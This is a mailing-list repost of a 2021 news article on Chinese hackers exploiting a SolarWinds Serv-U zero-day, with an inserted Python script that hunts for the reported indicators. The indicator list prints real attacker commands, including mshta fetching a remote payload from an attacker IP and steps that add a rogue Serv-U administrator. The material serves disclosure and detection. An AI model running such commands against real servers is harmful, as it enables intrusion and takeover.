[BreachExchange] SolarWinds 0-day gave Chinese hackers privileged access to customer servers

Sophia Kingsbury sophia.kingsbury at riskbasedsecurity.com
Wed Jul 14 11:26:28 EDT 2021


https://arstechnica.com/gadgets/2021/07/microsoft-says-hackers-in-china-exploited-critical-solarwinds-0-day/

Microsoft said on Tuesday that hackers operating in China exploited a
zero-day vulnerability in a SolarWinds product. According to Microsoft, the
hackers were, in all likelihood, targeting software companies and the US
Defense industry.

SolarWinds disclosed the zero-day on Monday after receiving notification
from Microsoft that it had discovered that a previously unknown
vulnerability in the SolarWinds Serv-U product line was under active
exploit. Austin, Texas-based SolarWinds provided no details about the
threat actor behind the attacks or how their attack worked.

Commercial VPNs and compromised consumer routers

On Tuesday, Microsoft said it was designating the hacking group for now as
“DEV-0322.” “DEV” marks a “development group” still under study, the label
Microsoft uses before its researchers have high confidence about the origin
or identity of the actor behind an operation. The company said that the
attackers are physically located in China and often rely on botnets made up
of routers or other types of IoT devices.

“MSTIC has observed DEV-0322 targeting entities in the US Defense
Industrial Base Sector and software companies,” researchers with the
Microsoft Threat Intelligence Center wrote in a post. “This activity group
is based in China and has been observed using commercial VPN solutions and
compromised consumer routers in their attacker infrastructure.”

Beyond the three attacker-affiliated servers already disclosed by
SolarWinds, Microsoft provided three additional indicators that people can
use to determine if they were hacked. The indicators of compromise are:

   - 98[.]176[.]196[.]89
   - 68[.]235[.]178[.]32
   - 208[.]113[.]35[.]58
   - 144[.]34[.]179[.]162
   - 97[.]77[.]97[.]58
   - hxxp://144[.]34[.]179[.]162/a
   - C:\Windows\Temp\Serv-U.bat
   - C:\Windows\Temp\test\current.dmp
   - The presence of suspicious exception errors, particularly in the
     DebugSocketLog.txt log file
   - C:\Windows\System32\mshta.exe http://144[.]34[.]179[.]162/a (defanged)
   - cmd.exe /c whoami > "./Client/Common/redacted.txt"
   - cmd.exe /c dir > ".\Client\Common\redacted.txt"
   - cmd.exe /c "C:\Windows\Temp\Serv-U.bat"
   - powershell.exe C:\Windows\Temp\Serv-U.bat
   - cmd.exe /c type \\redacted\redacted.Archive >
     "C:\ProgramData\RhinoSoft\Serv-U\Users\Global Users\redacted.Archive"

Tuesday’s post also provided new technical details about the attack.
Specifically:

"We observed DEV-0322 piping the output of their cmd.exe commands to files
in the Serv-U \Client\Common\ folder, which is accessible from the internet
by default, so that the attackers could retrieve the results of the
commands. The actor was also found adding a new global user to Serv-U,
effectively adding themselves as a Serv-U administrator, by manually
creating a crafted .Archive file in the Global Users directory. Serv-U user
information is stored in these .Archive files.

Due to the way DEV-0322 had written their code, when the exploit
successfully compromises the Serv-U process, an exception is generated and
logged to a Serv-U log file, DebugSocketLog.txt. The process could also
crash after a malicious command was run.

By reviewing telemetry, we identified features of the exploit, but not a
root-cause vulnerability. MSTIC worked with the Microsoft Offensive
Security Research team, who performed vulnerability research on the Serv-U
binary and identified the vulnerability through black box analysis. Once a
root cause was found, we reported the vulnerability to SolarWinds, who
responded quickly to understand the issue and build a patch."
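The indicator list and Microsoft's description of the post-exploitation
behaviour above translate directly into a few host and log checks. The
following Python script is an added example, not code from the Ars Technica
article, the list post or Microsoft: the IP addresses, dropped-file paths,
the Client\Common and Global Users folders and the DebugSocketLog.txt
exception symptom are taken from the text above, while the sample log
lines, the temporary directory tree and the file names it scans are
constructed here purely to exercise the checks.

```python
"""Hunt for the DEV-0322 / Serv-U indicators listed in the article.

Added example (not from the article or Microsoft's post). Indicator values
come from the article; log lines and the directory layout are constructed.
"""
import os
import re
import tempfile

# Network indicators from the article, kept defanged here; refang() turns
# them back into matchable strings.
DEFANGED_IPS = [
    "98[.]176[.]196[.]89",
    "68[.]235[.]178[.]32",
    "208[.]113[.]35[.]58",
    "144[.]34[.]179[.]162",
    "97[.]77[.]97[.]58",
]

# Files the actor dropped, relative to the system drive (C:\).
DROPPED_FILES = [
    r"Windows\Temp\Serv-U.bat",
    r"Windows\Temp\test\current.dmp",
]

# Constructed sample lines standing in for a proxy log and DebugSocketLog.txt.
SAMPLE_PROXY_LOG = [
    "2021-07-12 03:14:07 GET http://144.34.179.162/a 200",
    "2021-07-12 03:15:11 GET http://198.176.196.89/ 404",  # near miss, not an IoC
    "2021-07-12 03:16:02 CONNECT 97.77.97.58:443",
]
SAMPLE_DEBUG_SOCKET_LOG = [
    "Socket 1234 connected",
    "Unhandled exception in SSH session handler",
    "Socket 1234 closed",
]


def refang(indicator: str) -> str:
    """Turn 'hxxp://1[.]2[.]3[.]4/a' into 'http://1.2.3.4/a'."""
    return indicator.replace("[.]", ".").replace("hxxp", "http")


IOC_IPS = {refang(ip) for ip in DEFANGED_IPS}
# Boundaries so 98.176.196.89 is not matched inside 198.176.196.89.
IP_RE = re.compile(r"(?<![\d.])(\d{1,3}(?:\.\d{1,3}){3})(?![\d.])")


def find_ip_iocs(lines):
    """Return (line_number, ip) for every line mentioning a listed IP."""
    hits = []
    for n, line in enumerate(lines, 1):
        for ip in IP_RE.findall(line):
            if ip in IOC_IPS:
                hits.append((n, ip))
    return hits


def find_serv_u_exceptions(log_lines):
    """Microsoft notes the exploit leaves exception errors in
    DebugSocketLog.txt; return the line numbers that mention one."""
    return [n for n, line in enumerate(log_lines, 1)
            if "exception" in line.lower()]


def scan_host(system_drive, serv_u_root):
    """Check the file-system indicators from the article.

    system_drive: path standing in for C:\\
    serv_u_root:  path standing in for C:\\ProgramData\\RhinoSoft\\Serv-U
    Returns human-readable findings (an empty list means nothing found).
    """
    findings = []
    for rel in DROPPED_FILES:
        if os.path.exists(os.path.join(system_drive, *rel.split("\\"))):
            findings.append(f"dropped file present: {rel}")

    # The actor piped cmd.exe output into Client\Common, which Serv-U
    # serves to the internet by default; any .txt there deserves a look.
    common = os.path.join(serv_u_root, "Client", "Common")
    if os.path.isdir(common):
        for name in sorted(os.listdir(common)):
            if name.lower().endswith(".txt"):
                findings.append(f"unexpected text file in Client\\Common: {name}")

    # A crafted .Archive file in Global Users adds a Serv-U administrator,
    # so every archive there should be matched against known accounts.
    users = os.path.join(serv_u_root, "Users", "Global Users")
    if os.path.isdir(users):
        for name in sorted(os.listdir(users)):
            if name.lower().endswith(".archive"):
                findings.append(f"global user archive to verify: {name}")
    return findings


def demo():
    """Build a constructed directory tree (hypothetical host) and scan it."""
    drive = os.path.join(tempfile.mkdtemp(), "C")
    servu = os.path.join(drive, "ProgramData", "RhinoSoft", "Serv-U")
    for rel in ["Windows/Temp/test", "ProgramData/RhinoSoft/Serv-U/Client/Common",
                "ProgramData/RhinoSoft/Serv-U/Users/Global Users"]:
        os.makedirs(os.path.join(drive, rel))
    open(os.path.join(drive, "Windows", "Temp", "Serv-U.bat"), "w").close()
    open(os.path.join(servu, "Client", "Common", "redacted.txt"), "w").close()
    open(os.path.join(servu, "Users", "Global Users", "newadmin.Archive"), "w").close()
    return scan_host(drive, servu)


if __name__ == "__main__":
    print(find_ip_iocs(SAMPLE_PROXY_LOG))
    print(find_serv_u_exceptions(SAMPLE_DEBUG_SOCKET_LOG))
    print("\n".join(demo()))
```

On a real host you would point scan_host at the system drive and the
Serv-U install directory and feed find_ip_iocs the proxy, firewall or DNS
logs covering the exposure window; a hit on the Global Users check is only
a lead until the archive is compared with the accounts administrators
actually created.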

The zero-day vulnerability, which is tracked as CVE-2021-35211, resides in
SolarWinds’ Serv-U product, which customers use to transfer files across
networks. When the Serv-U SSH service is exposed to the Internet, exploits
give attackers the ability to remotely run malicious code with high system
privileges. From there, attackers can install and run malicious payloads,
or they can view and change data.

SolarWinds became a household name overnight in late December when
researchers discovered it was at the center of a supply-chain attack with
global reach. After compromising SolarWinds’ software build system, the
attackers used their access to push a malicious update to roughly 18,000
customers of the company's Orion network management tool.

Of those 18,000 customers, about nine of them in US government agencies and
about 100 of them in private industry received follow-on malware. The
federal government has attributed the attacks to Russia’s Foreign
Intelligence Service, which is abbreviated as the SVR. For more than a
decade, the SVR has conducted malware campaigns targeting governments,
political think tanks, and other organizations around the world.

The zero-day attacks that Microsoft discovered and reported are unrelated
to the Orion supply chain attack.

SolarWinds patched the vulnerability over the weekend. Anyone running a
vulnerable version of Serv-U should update immediately and check for signs
of compromise.